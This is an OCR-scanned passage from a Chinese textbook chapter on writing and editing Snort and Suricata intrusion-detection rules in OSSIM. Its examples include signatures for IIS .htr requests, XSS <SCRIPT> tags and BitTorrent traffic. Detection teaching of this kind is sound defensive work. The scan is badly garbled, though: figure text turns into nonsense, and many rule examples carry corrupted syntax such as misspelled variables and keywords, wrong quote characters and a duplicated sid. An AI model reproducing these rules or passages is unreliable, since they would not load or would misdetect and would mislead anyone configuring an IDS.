(2) var EXTERNAL NET any， 用 来 设 定 对 外 网 络 监听 界面 ， 默 认 any 代表 任何 一 个 本 
机 网 络 界 面 都 监听 。 


Snort 规则 是 文本 格式 ， 它 存在 于 /etc/snort/rules 目录 中 ， 一 旦 触发 规则 ，Snort 会 有 5 种 
动作 类 型 : 

€ pass 动作 : pass 将 忽略 当前 的 包 ， 后 续 被 捕获 的 包 将 被 继续 分 析 。 

€ alert 动作 : alert 将 按照 已 配置 的 格式 记录 包 进 行 报警 。 这 是 常用 的 动作 。 

© dynamic 动作 : 它 保持 为 一 种 潜伏 状态 ， 直 到 activate 类 型 的 规则 将 其 触发 ， 之 后 它 
HR log 动作 一 样 记录 数据 包 。 

€ ”log 动作 : 将 按照 已 配置 的 格式 记录 数据 包 ; 

€ activate 动作 : 当 被 规则 触发 时 产生 报警 ， 并 启动 相关 dynamic 类 型 规则 ， 尤 其 在 检 
测 复 杂 入 侵 攻 击 时 常用 。 


如 上 面 那 条 规则 例子 中 ， 每 条 规则 包含 多 个 规则 选项 ， 如 msg. flow. content. reference 
等 。 各 个 规则 选项 之 间 用 分 号 (; ) 分 隔 开 来 ， 而 规则 选项 名 和 规则 选项 内 容 之 间 由 冒号 G ) 
区 分 。 在 庞大 的 规则 库 中 ， 各 个 规则 之 间 是 “或 ”的 关系 ， 只 要 一 个 数据 包 与 单条 规则 匹配 ， 
就 判定 该 数据 包 为 有 害 数 据 包 而 每 条 规则 中 的 各 个 规则 选项 是 “与 ”的 关系 。 只 有 当 一 个 数 
据 包 与 一 条 规则 中 的 所 有 规则 选项 都 匹配 时 ,才能 判定 该 数据 包 为 有 害 数据 包 , 只 要 有 一 条 不 
符合 ， 就 不 与 该 规则 匹配 。 
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目前 Snort 支持 ICMP, TCP, IP 和 UDP 4 种 协议 。 规 则 头 的 后 面部 分 则 用 于 指定 该 规则 
的 源 和 目的 IP 地 址 。Snort 规则 体 部 分 由 若干 个 被 分 号 隔 开 的 片段 组 成 ， 每 个 片段 均 定 义 了 一 
个 选项 和 相应 的 选项 值 。 规 则 体 中 的 可 选项 为 : 


content: 寻找 一 个 指定 模式 下 的 包 负载 ; 

flags: 测试 指定 的 TCP 标识 ; 

tl; 检查 IP 头 的 TTL 域 的 值 ; 

itype: ICMP 类 型 域 匹 配 ; 

icode: ICMP 代码 域 匹配 ; 

minfrag: 设 定 IP 分 片 大 小 的 起 始 值 ; 

id: 测试 指定 的 IP 头 的 值 ; 

ack: 查找 一 个 已 经 确认 的 TCP X; 

seq: 记录 一 个 TCP 头 顺 序 的 值 ; 

logto: 将 匹配 的 包 记录 到 指定 文件 的 名 字 ; 

dsize: 匹配 包 负载 的 尺寸 ; 

offset: 用 于 内 容 选 项 的 修改 ， 在 数据 包 负载 中 设置 偏 移 量 以 开始 内 容 搜 索 ; 
depth: 用 于 内 容 选 项 的 修改 ， 设 置 搜索 开始 位 置 的 字 节 数字 ; 

msg: 设置 当 一 个 包产 生 事 件 时 要 发 送 的 信息 ; 

content-list: 在 报 文中 搜索 与 Snort 规则 库 中 相 匹 配 模式 的 集合 ; 
uricontent: 对 特定 的 Web 协议 进行 通信 分 析 ， 只 匹配 URL 请 求 的 部 分 ; 
nocase: 说 明 该 规则 对 文本 内 容 与 规则 库 进行 匹配 时 ， 字 符 串 的 大 小 写 也 可 以 混用 。 


这 些 选项 可 通过 任意 组 合 来 检测 和 分 类 所 关注 的 包 。 规 则 选项 使 用 逻辑 “与 ”来 处 理 ， 规 
则 中 所 有 的 测试 选项 必须 为 真 ， 这 样 规则 才能 产生 正确 的 响应 并 调用 程序 执行 规则 的 动作 。 


6.4.2 ”规则 组 成 及 含义 

经 过 以 上 对 Snort 规则 的 介绍 和 应 用 举例 ， 相 信 各 位 读者 对 于 Snort 的 使 用 了 更 深入 的 
理解 ， 当 然 ， 当 我 们 把 Snort 作为 IDS 系统 来 使 用 时 ， 需 要 详细 了 解 这 些 过 滤 规 则 及 组 成 和 含 
义 。 多 数 Snort 规则 都 是 以 单行 进行 描述 ， 当 然 复杂 的 情况 也 有 ， 规 则 因为 长 度 的 关系 会 搭配 
“/” 来 进行 分 行 处 理 。 例 如 : 

alert icmp $EXTERNAL NET any -> $HOME_NET any (msg: "ICMP ISS Ping"; 


itype;8;content: "ISSPNGRQ"; depth:32; 
reference:arachnids,158;classtype:attempted-recon;sid:456; rev:4;) 
Snort 的 规则 可 分 为 两 部 分 : 


(1) Snort 规则 头 (Rule Header) 
在 规则 头 中 包含 了 检测 数据 包 的 基本 信息 , 一 共 包 含 了 7 个 项 目 , 每 个 项 目 都 会 记录 着 特 
定 信息 来 提供 给 规则 判断 使 用 。 
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(2) 规则 动作 (Rule Action) 
这 个 项 目 包含 下 表 6-5 中 列 出 的 规则 动作 ， 用 来 针对 数据 包 进行 执行 判断 。 


表 6-5 Snort 规则 动作 说 明 


规则 动作 说 明 
针对 此 数据 包产 生 一 个 警报 ， 并 且 记 录 
Log 将 此 数据 包 记录 下 来 


Pass 忽略 符合 这 个 规则 的 数据 包 
针对 此 数据 包产 生 一 个 警报 ， 并 且 以 另外 一 个 Dynamic 规则 来 进行 数据 包 的 处 理 
| Dynamic | 主要 是 针对 Activate 规则 动作 提供 数据 包 处 理 时 使 用 


Snort 规则 中 有 7 个 重要 参数 需要 说 明 。 


(1) 协议 (ProtocolD): 常见 的 有 TCP、UDP 或 ICMP 协议 等 。 

(2) W IP (Source IP Address): 针对 通过 规则 的 数据 包 来 源 IP 地 址 进行 指定 ， 可 以 通过 
正规 表示 式 的 方式 来 设 定 一 个 符合 的 源 IP 地 址 。 如 果 在 源 IP 地 址 前 方 添加 上 一 个 ! 号 ， 则 表 
示 除 此 之 外 的 TP 地 址 数据 包 。 例 如 : 

alert tcp ! [192.168.150.0/24,192.168.200.0/24] any 


在 上 面 这 个 条 件 中 ， 针 对 不 是 从 192.168.150.0/24 与 192.168.200.0/24 这 两 个 网 段 的 任 一 
来 源 的 TCP 数据 包 进 行 警报 。 

G) 源 端口 Source Por): 它 可 将 规则 定义 的 更 细 ， 常 见 的 用 法 是 使 用 any 这 个 关键 字 
来 表示 所 有 的 端口 ， 或 是 利用 一 段 范围 来 表示 一 个 指定 的 端口 ， 下 面 简单 举 几 个 例子 : 

@ 所 有 范围 : log tcp 192.168.150.0/24 any 


€ ”一段 端口 范围 : log tcp 192.168.150.0/24 any 1:1024 
e 某 个 特定 端口 : log tcp 192.168.150.0/24 80 


除 以 上 3 种 基本 表示 方式 之 外 ， 还 有 下 面 三 种 特殊 表示 形式 : 


e 小 于 等 于 一 个 端口 的 表示 : log tcp 192.168.150.0/24 :1024 

© 大 于 等 于 一 个 端口 的 表示 : log tep 192.168.150.0/24 8000 

© ”排除 某 个 端口 的 表示 : log tep 192.168.1.0/24 !23 

(4) 指示 动作 (Direction Operator): 通常 是 用 于 连接 源 IP 与 目标 IP 的 关系 ， 常 见 指示 
动作 有 以 下 两 种 : 

@ 方 向 操作 符号 ->: 方向 操作 符号 是 常见 的 指示 动作 ， 符 号 的 左边 代表 源 IP， 符 号 的 右 
边 是 数据 包 的 目的 IP 及 端口 号 ， 实 际 上 是 两 条 方向 相反 规则 的 一 个 合并 ， 即 源 -> 目的 ， 目 的 
-> 源 ， 在 构建 规则 时 ， 此 规则 将 被 拆 分 成 为 两 条 规则 ， 例 如 : 


log tcp any any ->192.168.150.0/24 443 
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这 个 含义 是 通过 Snort 来 记录 来 自任 何 IP 和 端口 的 所 有 TCP 数据 包 ， 只 要 这 些 数 据 包 的 
目的 地 址 是 流向 192.168.150.0/24 这 个 网 段 中 的 443 端口 ， 便 将 这 些 数据 包 记 录 下 来 。 


加 双向 操作 符号 <>: 它 可 以 将 源 一、 端口 号 和 目的 IP. 及 端口 号 进行 交换 判断 使 用 。 例 
如 : 


log tcp 192.168.150.0/24 80 any () 192.168.150.0/24 80 


这 句 规则 表示 源 IP 可 能 是 从 192.168.150.0/24 网 段 中 的 任何 一 个 TCP 数据 包 或 是 从 
192.168.150.0/24 网 段 中 80 端口 传 过 来 的 数据 包 ， 而 目的 地 址 除了 为 192.168.150.0/24 网 段 中 的 
80 端口 之 外 ， 也 可 能 是 192.168.150.0/24 网 段 中 任何 一 个 地 址 ， 这 些 数据 包 都 会 被 记录 下 来 。 


(5) 目的 IP (Destination IP Address): 目的 IP 的 使 用 方式 与 来 源 IP 的 使 用 方式 相同 。 
(6) 目的 端口 (Destination Port): 目的 端口 的 使 用 方式 与 源 端 口 的 使 用 方式 相同 。 
CT) 规则 选项 (Rule Options): 刚才 所 介绍 的 规则 头 是 Snort 规则 对 于 数据 包 进入 时 的 最 
初 对 比 , 而 比 对 匹配 成 功 后 的 数据 包 怎 么 处 理 呢 ? 应 该 执行 哪些 动作 ? 这 就 是 规则 选项 该 发 挥 
的 作用 了 。 
规则 选项 部 分 是 整个 Snort 引擎 的 核心 ， 使 用 规则 选项 时 要 特别 注意 两 个 符号 的 使 用 ， 分 
别 是 分 号 (;) 与 冒号 〈:)。Snort 所 提供 的 规则 选项 符号 很 多 。 
这 里 主要 介绍 一 般 形 态 的 规则 选项 (General Rule Options). 
在 这 个 类 型 中 的 规则 选项 通常 是 用 来 提供 资讯 给 规则 进行 使 用 ,但 这 些 资讯 并 不 会 影响 到 
检测 的 结果 或 是 过 程 。 常 见 的 规则 选项 如 表 6-6 所 示 。 


举例 一 : 我 们 在 SIEM 中 能 看 到 Snort 规则 ， 这 些 规则 的 具体 含义 我 们 给 大 家 讲解 一 下 ， 
先 看 图 6-22 中 的 例子 。 


Signotwre vDoleGMI«BQ04 Sensor Source Destination Ert Risk 
E gp snort: "T POUCY CNU/Unux 
APT User-Agent Outbound likely related to 2013072823000! server 19216&113032861. 4703837780 PN e 


jent Outbound likely r 
agement” 


e Snort rule Detection 
File: emerging-policy.rules 


Rule: alert tcp $HOME_NET any -> SEXTERNAL. NET SHTTP. PORTS 
msg: "ET POLICY GNU/Linux APT User-Agent Outbound likely related to package management" 
flow: established,to. server 
content: "APT-HTTP|2F|" 
http header: 
reference: url,help.ubuntu.com/community/AptGet/Howto 
classtype: not-suspicious 
sid: 2013504 
rev:3 


6-22 OSSIM 中 Snort 规则 举例 
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规则 解释 如 表 6-6 所 示 。 


规则 选项 


msg 


reference 


gid 


sid 


classtype 


priority 


threshold 


表 6-6 规则 选项 含义 

说 PA 

msg 这 个 规则 选项 的 主要 功能 是 当 封 包 检测 符合 规则 时 ， 在 记录 或 是 发 出 警报 信息 时 ， 
会 将 msg 这 个 规则 选项 中 所 指定 的 文字 信息 一 并 记录 或 是 在 发 出 警报 信息 中 显示 。 其 语 
法 格式 为 : msg: “<message text>”; 图 中 显示 为 “ET POLICY GNU/Linux APT 
User-Agent Outbound likely related to package management” 

Reference 此 规则 选项 ， 主 要 是 可 以 用 来 提供 Snort 使 用 其 他 的 外 部 攻击 识别 系统 来 帮助 
入 侵 检测 的 强度 ， 可 以 引入 一 些 由 Snort 所 认可 的 一 些 外 部 网 站 来 进行 使 用 ， 其 语法 格 
式 为 : reference:<id system>,<id>; 

有 些 Snort 规则 会 显示 gid 这 个 规则 选项 它 是 指 用 来 识别 所 设 定 的 规则 内 容 是 属于 Snort 
所 规范 的 哪些 事件 ， 这 些 事 件 识别 码 都 会 预先 定义 在 /etc/snort/gen-msg.map 文件 (大 小 约 
25KB) 内 。 其 语法 格式 为 :gid:<generator id>;。 预 设 规则 如 果 不 指 定 使 用 的 gid 识别 码 ， 
那么 是 直接 使 用 1 (snort general alert) 来 进行 运作 ， 读 者 若 希望 自 定义 新 的 gid 识别 码 时 
最 好 是 从 一 百 万 以 后 开始 编码 使 用 

sid 这 个 规则 选项 是 指 用 来 识别 所 使 用 的 Snort 规则 项 目 ， 这 些 Snort 所 使 用 的 规则 项 目 预 
先 也 会 定义 在 /etc/snort/sid-msg.map 文件 (大 小 约 2.7MB) 内 , 其 语法 格式 为 :sid:<snort rules 
id>;。 而 sid 所 使 用 的 范围 基本 上 分 为 三 大 部 分 ， 分 别 为 : 

* 小 于 100: 这 是 保留 给 未 来 扩充 时 使 用 

"100 一 1.000.000: Snort 官方 所 预 设 配置 的 规则 项 目 

* 大 于 1.000.000: 本 机 所 自 定义 的 Snort 规则 项 目 
classtype 这 个 规则 选项 可 以 用 来 将 所 涉及 的 入 侵 检 测 规则 进行 分 类 并 且 赋 予 一 个 预 设 的 
优先 等 级 ，Snort 提供 了 许多 不 同 的 规则 分 类 ,这些 分 类 可 以 让 Snort 在 运行 时 更 有 弹性 。 
其 语法 格式 为 : classtype:<class name»; 

rev 这 个 规则 选项 是 针对 Snort 规则 所 识别 的 修订 识别 码 ， 一 般 在 它 上 面 都 会 搭配 sid。 其 
语法 格式 为 : rev:<revision integer>; 

可 选项 priority 规则 ， 它 可 以 用 来 指定 Snort 规则 的 优先 等 级 ， 其 语法 格式 为 : priority:< 
priority integer>;。 如 果 读 者 在 规则 中 使 用 priority 时 也 搭配 使 用 刚才 所 介绍 的 classtype， 
由 于 classtype 中 有 一 个 预 设 优 先 权 选项 ， 若 是 这 个 选项 值 也 被 启用 时 ， 将 会 覆盖 priority 
规则 选项 中 的 值 ， 读 者 在 操作 时 需要 注意 

代表 闪 值 ， 后 面 往往 跟 一 个 数值 ， 例 如 : threshold:type threshold, count 5,seconds 60 表示 
60s ARE 5 次 就 告警 。Track by src 表示 跟踪 统计 源 IP, track by. dst 表示 统计 目标 IP, 
而 且 是 不 同 的 IP 到 达 阐 值 


举例 二 : 
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OP Snort rule Detection 


File: emerging-policy.rules 
Rule: alert tcp $HOME_NET any -> $EXTERNAL_NET SHTTP PORTS 
msg: "ET POLICY Outdated Windows Flash Version IE" 
flow: established.to server 
content: "x-flash-version|3al " 
http. header: 
content: !"11,8,800,94/0d Oal” 
distance: 0 
within: 13 
http. header: 
content: "MSIE * 
http header: 
pcre: */^User-AgentVx3a[^V^n]3?MSIE/Hm" 
threshold: type limit, count 1, seconds 60, track by. src 
reference: url,www.adobe.com /software/flash/about/ 
classtype: policy-violation 
sid: 2014726 
rev: 21 


623 OSSIM 中 Snort 规则 举例 二 


Classtype 含义 如 表 6-7 所 示 。 


表 6-7 Snort 中 classtype 含义 


classtype 含义 优先 级 
Attempted-admin 试图 取得 管理 员 权限 


发 现 木马 攻击 


Web-application-attack Web 应 用 程序 攻击 高 


拒绝 服务 攻击 高 0 | 
Reference 所 支持 的 外 部 系统 的 网 址 如 表 6-8 所 示 。 
表 6-8 Reference 所 支持 的 外 部 系统 


Shellcode-detect 发 现 shellcode 攻击 高 | 


支持 系统 ID 
http://www.securityfocus.com/bid 


http://www.nessus.org/plugins/ 


http://cve.mitre.org/compatible/ 
tp://osvdb.org/show/osvdb/. 
arachNIDS http://www.whitehats.com/info/IDS 


在 OSSIM 中 这 些 网 址 在 /etc/snort/reference.config 文件 中 定义 ， 然 后 会 被 Snort 主 配置 文 
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fF snort.conf 所 引用 。Payload (有 效 载荷 ) 的 规则 选项 含义 如 表 6-9 所 示 ， 通 常 可 以 针对 特定 
的 数据 包 内 容 来 设 定 搜索 条 件 。 


表 6-9 Payload 规则 选项 含义 
规则 选项 
这 个 选项 可 允许 使 用 者 自 定义 关键 字 ， 进 行 数据 包 内 容 的 有 效 载 荷 搜索 。 语 法 为 
content: [!] “<content string>”， 它 可 以 搭配 关键 词 来 搜索 ， 具 体 关键 词 如 表 6-10 


所 示 


这 一 规则 选项 允许 使 用 在 涉及 Snort 规则 时 使 用 Perl 相 兼 容 的 表达 式 


Uricontent 这 个 规则 代表 允许 使 用 者 通过 正规 表达 式 处 理 URI 内 容 ， 语 法 为 :uricontent: [!]” 
<content string>” 


content 选项 中 关键 词 的 使 用 如 表 6-10 所 示 。 


表 6-10 content 选项 中 关键 词 的 使 用 


它 用 来 指定 Snot 规则 在 搜索 数据 包 要 从 哪 一 个 地 方 开始 搜索 ， 语 法 为 : 
offset:<number>， 例 如 alert tcp any any -> any 8080 (content:” cgi-bin/open” ; offset 
10;depth:6;) 这 条 规则 含义 是 针对 传 入 到 8080 端口 的 tep 数据 包 ， 跳 过 前 面 10 个 单 
位 内 容 ， 往 后 5 个 单位 内 容 搜索 cgi-bin/open 的 字符 串 
指定 Snort 规则 在 搜索 数据 包 内 容 时 可 以 用 来 确认 搜索 的 内 容 
指定 Snort 规则 在 搜索 数据 包 内 容 
用 来 指定 Snort 规则 在 搜索 数据 包 时 是 以 HTTP 用 户 端 连 接 请 求 的 数据 包 的 HTTP 
表 头 内 容 进行 搜索 。 与 它 的 使 用 含义 类 似 的 关键 词 还 有 http_cookie、http_method、 

http uri 等 


Snort 规则 的 编写 能 力 非 一 日 之 功 ， 在 平时 大 家 多 实战 ， 多 总 结 ， 这 里 介绍 一 个 小 窍门 ， 
利用 网 络 分 析 光 盘 (BT4/5, DEFT 8) 中 蕴藏 着 丰富 的 测试 工具 ， 通 过 渗透 测试 和 模拟 攻击 来 
快速 获得 比较 全 面 的 信息 ， 另 外 大 家 还 可 以 参考 这 个 Snort 在 线 规则 生成 器 来 学 习 ， 
http://183.62.34.17:8080/1080p/asp/snort/snortrules.html 效果 如 图 6-24 所 示 。 


Distance 
Within 
http_header 


协议 来 源 地 址 来 尖端 口 目标 地 址 目标 端口 
wp vfs vv 用 an: fe vllo: 任意 vja ue y] ans 
TR REUS MERREN E RE 
mm ETT honak, ië MESE pasce go Ww 
hs ERARE pogino EMEA ER IRE) 
eitis. j^ 1 easur deben. 
ris ner * vl R9 v] TE 
IDEE I 
ES a BEARES [mitis summe 
z z E. 可 以 SEES. 
(pM MEME HOUSED Hem eNEAN eA is | mcs 
lamine la, anima ERE 
[iiia [ide 
ATEERDAN, iBSETEUGED IDSCEIS AEri, BARE ccaf 中 已 经 月 用 了 相应 的 =ale 广 件 ， 然 后 重新 动 saoxt， 


datae. 


alert tcp 


624 在线 规 则 生成 
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6.4.3 ”编写 Snort 规则 

编写 规则 之 前 ， 一 定 要 注意 语法 并 注意 逻辑 关系 ， 违 反 语 法 的 Snort 规则 将 不 能 被 载 入 到 
检测 机 制 中 ,不 合 逻辑 的 规则 无 法 生效 。 如 果 载 入 语法 有 错 的 规则 ,那么 可 能 导致 不 可 预料 的 
后 果 。 


(1) 基础 知识 

对 于 刚 接 触 Snort 规则 编写 的 新 手 而 言 ， 操 作 Snort 规则 最 简单 的 一 种 方法 就 是 对 已 有 的 
规则 进行 修改 。 假 设 只 有 一 台 IIS 服务 器 (IP=192.168.1.1)， 想 修改 与 IIS 相关 的 规则 使 它们 
仅仅 应 用 在 这 台 服 务 器 上 ， 而 不 是 用 在 每 台 Web 服务 器 上 。 起 始 可 能 想 要 修改 Snort-sigs 邮件 
列表 中 后 级 为 “.htr chunked” 的 编码 规则 ， 内 容 如 下 : 


alert tcp $EXTERNAL_NET any -> $ HTTP SERVERS $ HTTP PORTS (msg:"WEB-IIS.htr 
chunked encoding"; uricontent:".htr";classtype:web-application-attack;rev: 1;) 


为 了 使 它 仅仅 应 用 于 US 服务 器 上 ， 应 改 为 : 


alert tcp S$EXTEBNAL NET any -> 192.168.1.1 $ HTTP PORTS (msg:"WEB-IIS.htr 
chunked encoding"; urioontent:".htr";classtype: web-application-attack;rev: 2;) 


现在 可 以 在 192.168.1.1 的 Web 服务 器 上 使 用 该 规则 ， 注 意 “rev” 关 键 字 由 1 变 为 2， 表 
明 这 是 一 个 已 存在 规则 的 新 版 本 。 

下 面 进一步 提炼 该 规则 ， 和 希望 仅 在 向 服务 器 提出 请 求 时 使 用 该 规则 ， 因 为 该 方向 的 流量 
可 能 是 某 种 攻击 。 也 可 能 希望 仅 在 已 建立 的 TCP 会 话 中 应 用 该 规则 ， 阻 止 攻击 者 利用 误 报 的 
洪水 进行 DOSing Snort 攻击 。 可 以 加 入 flow 选项 ， 例 如 : 

alert tcp $ EXTERNAL NET any -> 192.168.1.1 $ HTTP_PORTS (msg:"WEB-IIS .htr 


chunked encoding"flow:to server,established;uricontent:".htr"; classtype: 
web-application-attack; rev:3;) 


加 载 该 规则 之 后 ， 删 除 误 报 数量 减少 。 

(2) 技能 提高 

当 网 站 允许 恶意 代码 被 插入 到 一 个 动态 创建 的 网 页 中 时 ， 跨 站 脚本 CXSSO 攻击 就 会 发 生 。 
如 果 不 能 正确 地 检查 用 户 输入 ， 攻 击 者 就 可 以 在 网 页 中 嵌入 脚本 ， 这 些 脚本 使 Web. 应 用 程序 
不 能 按照 预期 执行 。 大 多 数 的 XSS 攻击 需要 向 特定 页 面 请 求 中 插入 脚本 标记 。 可 以 使 用 XSS 
攻击 的 这 个 特征 编写 规则 。 因 为 只 要 向 Web 应 用 程序 插入 XSS 脚本 ， 就 会 使 用 到 <SCRIPT>、 
<OBJECT>、<APPLET> 和 <EMBED> 等 标记 。 例 如 ， 当 发 现 <SCRIPT> 标 记 时 ， 触 发 该 规则 。 
首先 ， 应 该 创建 一 个 规则 ， 触 发 包含 “<SCRIPT>” 字 符 串 内 容 的 流量 : 


alert tcp any any -> any any (content:"<SCRIPT>"; msg:"WEB-MISC XSS attempt";) 


XSS 攻击 会 触发 该 规则 ， 与 此 同时 许多 其 他 的 正常 流量 也 会 触发 这 个 规则 。 例 如 ， 假 设 
某 人 人 发送 一 个 柑 有 JavaScript 代码 的 电子 邮件 ，Snort 也 会 发 出 报警 ， 从 而 产生 误 报 。 为 了 避 
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免 这 种 情况 的 发 生 ， 就 需 继续 修改 这 个 规则 ， 使 其 仅 在 Web 流量 中 触发 : 

alert tcp SEXTERNAL NET any ->$ HTTP SERVERS $ HTTP PORTS (content: 
“<SCRIPT>” ;msg: *WEB-MISC XSS attempt" ;) 

现在 ， 仅 在 来 自 Web 服务 器 的 相关 HTTP. 会 话 中 检测 到 <SCRIPT> 内 容 时 ， 才 会 触发 该 规 
则 。 当 流量 开始 于 一 个 外 部 的 IP 地 址 CSEXTERNAL _NET)， 并 被 发 送 给 Web 服务 器 ($ 
HTTP SERVERS) 上 HTTP 服务 端口 CSHTTP. PORTS) 时 ， 该 规则 才 被 触发 。 但 在 载 入 这 个 
规则 之 后 ， 会 发 现 无 论 何 时 有 包含 JavaScript 的 请 求 时 ， 还 会 产生 大 量 的 误 报 。 因 此 ， 需 要 更 
进一步 地 改进 该 规则 ， 找 到 XSS 流量 的 唯一 特征 。 

4 6 P E WSR HP ik A «SCRIPT» bid RRE XSS。 如 果 服 务 器 发 送 请 求 响应 的 
<SCRIPT> 标 记 ， 它 可 能 是 正确 的 流量 (如 JavaScript)， 而 不 是 一 个 XSS 攻击 。 可 以 使 用 这 个 
XSS 攻击 特征 进一步 提炼 该 规则 : 


alert tcp $ EXTERNAL NET any-» $HTTP SERVERS $ HTTP PORTS (msg:"WEB-MISC XSS 
attempt"; flow:to server,established;content:"«SCRIPT»";) 


这 个 改进 后 的 规则 使 用 了 flow 选项 ， 该 选项 使 用 Snort 的 TCP 重建 特征 来 鉴别 流量 的 方 
向 。 通 过 应 用 特定 的 flow 选项 ，“to_server” 和 “established” 规 则 仅 对 从 客户 端 向 服务 器 端 
发 起 的 会 话 有 效 。XSS 攻击 只 有 可 能 发 生 在 这 个 方向 传输 的 流量 中 ， 而 反方 向 上 的 流量 则 可 
能 是 一 个 包含 JavaScript 标记 的 正常 的 HTTP 会 话 。 

现在 规则 已 经 可 以 识别 XSS 攻击 了 ， 接 着 需要 利用 大 小 写 敏感 性 确保 攻击 者 不 能 躲避 规 
则 。Contend 选项 可 用 来 区 分 大 小 写 ， 然 而 HTML 不 区 分 大 小 写 , 因此 攻击 者 可 以 通过 将 脚本 
标记 修改 为 < _ scripf> 或 <script> 避 开 这 个 规则 ， 为 了 弥补 这 一 点 ， 应 用 contend 选项 来 指定 不 
区 分 大 小 写 。 

alert tcp $ EXTERNAL NET any-» $ HTTP SERVERS $ HTTP PORTS (msg:"WEB-MISC XSS 
attempt"; flow:to server,established; content:"«SCRIPT»"; nocase;) 


为 了 完成 该 规则 ， 还 需 给 它 赋 予 一 个 较 高 的 优先 级 。 
alert tcp $ EXTERNAL NET any ->$ HTTP SERVERS $ HTTP PORTS (msg:"WEB-MISC XSS 
attempt";flow:to server,established; content:"«SCRIPT»"; nocase;priority:1;) 


cm 由 于 Snot 不 支持 对 主机 名 的 解析 ， 所 以 IP 地 址 只 能 使 用 CIDR 的 形式 。 | 


在 规则 中 ， 可 以 使 用 否定 操作 符 对 IP 地 址 进行 操作 ， 表 示 Snort 除了 列 出 的 IP 地 址 外 ， 
匹配 所 有 的 IP 地址。 否定 操作 符 使 用 ! 表 示 。 
例如 : 


alert tcp !192.168.1.0/24 any -> 192.168.150.0/24 111(content:"100 01 86 
a5|";msg:"externalmountd access" 
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(3) 端口 说 明 

在 规则 中 ， 可 以 有 几 种 方式 来 指定 端口 号 ， 包 括 : any. Hf SEX. AIL. any 
表示 任意 合法 的 端口 号 ; 静态 端口 号 表示 单个 的 端口 号 , 例如 : 111 (portmapper)、23 (telnet)、 
80 (Chttp)、443 Chttps) 等 。 使 用 范围 操作 符 :可 以 指定 端口 号 范围 。 有 几 种 方式 来 使 用 范围 操 
作 符 : 达 到 不 同 的 目的 。 

例如 : 

log udp any any ->192.168.150.0/24 1:1024 


记录 来 自任 何 端口 ， 其 目的 端口 号 在 1-1024 的 UDP 数据 包 。 
log tcp any any ->192.168.150.0/24 :600 


记录 来 自任 何 端口 ， 其 目的 端口 号 对 600 的 TCP 数据 包 。 
log tcp any :1024 ->192.168.1.0/24 500: 
记录 源 端口 入 1024， 目 的 端口 过 500 的 TCP 数据 包 。 
(4) 方向 操作 符 
方向 操作 符 -> 表 示 数 据 包 的 流向 。 它 左边 是 数据 包 的 源 地 址 和 源 端口 ， 右边 是 目的 地 址 和 
端口 。 此 外 ， 还 有 一 个 双向 操作 符 <>， 它 使 用 Snort 对 这 条 规则 中 两 个 IP 地 址 /端口 之 间 双 向 
的 数据 传输 进行 记录 /分 析 ， 例 如 telnet 对 话 ， 下 面 的 规则 表示 对 一 个 telnet 对 话 的 双向 数据 传 
输 进 行 记录 : 
log !192.168.150.0/24 any <> 192.168.150.0/24 23 
(5) 实战 
Snort 的 运行 效果 取决 于 规则 ， 使 用 不 精确 或 误 报 的 规则 对 于 网 络 安 全 威胁 很 大 。 如 果 想 
为 某 种 特殊 的 攻击 编写 Snort 规则 ， 则 需要 在 测试 环境 中 重 现 攻 击 过 程 ， 并 且 保 证 嗅 探 器 能 够 
监听 到 通信 ， 然 后 捕获 从 攻击 机 发 出 的 包 以 及 被 成 功 攻击 的 受害 机 发 出 的 应 答 包 。 
例如 ，BT 下 载 消 耗 网 络 资源 ， 但 BT 下 载 过 程 中 ， 种 子 列表 是 动态 变化 的 ， 不 可 能 通过 
在 Iptables 防火 墙 汇 总 添加 固定 的 规则 ， 起 到 限制 BT 下 载 的 目的 ， 我 们 在 Snort 中 添加 规则 ， 
来 达到 阻 断 BT 下 载 的 目的 。 
分 析 过 程 : 首先 通过 抓 包工 具 如 Wireshare， 抓 取 BT 下 载 的 数据 流 作为 研究 样本 。 经 过 
分 析 可 知 BT 客户 端 向 服务 器 请 求 种 子 列 表 的 GET 报 文中 一 般 包 含 如 下 典型 特征 内 容 : 


"GET", "/announce", "info hash","event-started"; 


而 BT 客户 端 和 种 子 列表 开始 交互 数据 包 中 包含 如 下 特征 : 


"1131BitTorrent Protocol", 
基于 这 两 个 特征 我 们 编写 两 条 规则 ， 然 后 添加 到 规则 库 中 。 
@ 规则 1 
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alert tcp $HOME NET any ->$EXTERNAL NET any(msg:"P2P BitTorrent announce 
request";flow:to server,established;content:"GET";depth:4;content:"/announce"; 
distance:1;content:"info hash-";offset:4;content:"event-started";offset:4; 
classtype:policy-violation;sid:2780;rev:3;) 

该 规则 用 来 匹配 包含 "GET"、"/announce"、"info_hash="、"event=started" 内 容 的 TCP 数据 
包 文 ， 它 们 之 间 是 “与 ”的 关系 。 

e mo 

alert tcp $HOME_NET any -»$EXTERNAL NET any(msg:"P2P BitTorrent 
transer";flow:to server,established;content:"|13|BitTorrentprotocol";depth:20; 
clastype:policy-violation;sid:2780;rev:3;) 

此 规则 用 来 匹配 包含 “|13|BitTorrentprotocol” 的 客户 端 向 服务 器 发 送 的 请 求 种 子 列 表 的 
报 文 及 BT 客户 端 之 间 交 互 的 BitTorrent Protocol， 然 后 发 出 报警 信息 。 

(6) 规则 统计 ID 

Snort 中 每 条 规则 都 对 应 唯一 的 规则 ID 号 : sid, E CVE 中 对 每 个 规则 相对 应 的 漏洞 ， 
都 有 一 个 相应 的 漏洞 描述 文件 ， 该 文件 是 以 漏洞 ID 号 命名 的 ， 里 面 描述 了 该 漏洞 的 概要 
(Summary), EMME (Detailed Information)、 受 影响 的 系统 CAffected Systems) 等 。 为 了 
方便 统计 ， 我 们 把 所 有 的 描述 文件 导入 数据 库 ， 再 通过 sid 关联 把 规则 文件 (rules) 的 相应 字 
段 导 入 到 数据 库 中 ， 然 后 在 数据 库 中 通过 关键 字 进 行 统计 。 


6.4.4 手工 修改 Suricata 规则 

Suricata 规则 库 路 径 在 /etc/suricata/suricata.yaml 中 定义 ， 它 们 在 /etc/suricata/rules 目录 下 ， 
根据 分 类 去 修改 相关 文件 ， 例 如 要 添加 Nmap 扫描 的 规则 ， 则 编辑 emerging-scan.rules 文件 。 
在 OSSIM 中 如 何 修改 规则 。 

(1) 首先 编辑 规则 


#vi /etc/snort/rules/my.rules 
alert tcp any any -> any 112 (msg:"TCP Traffic";) 


(2) 把 my.rules 规则 添加 到 snort.conf P o 


编辑 /etc/snort/snort.conf， 在 文件 末尾 添加 : 
# 添 加 新 规则 


include $RULE PATH/emerging-my.rules 


6.4.5 ”启用 新 建 的 ET 规则 
在 Snort 中 所 谓 “ET 规则 ”代表 Emerging Threats， 它 可 以 在 下 面 网 址 下 载 。 


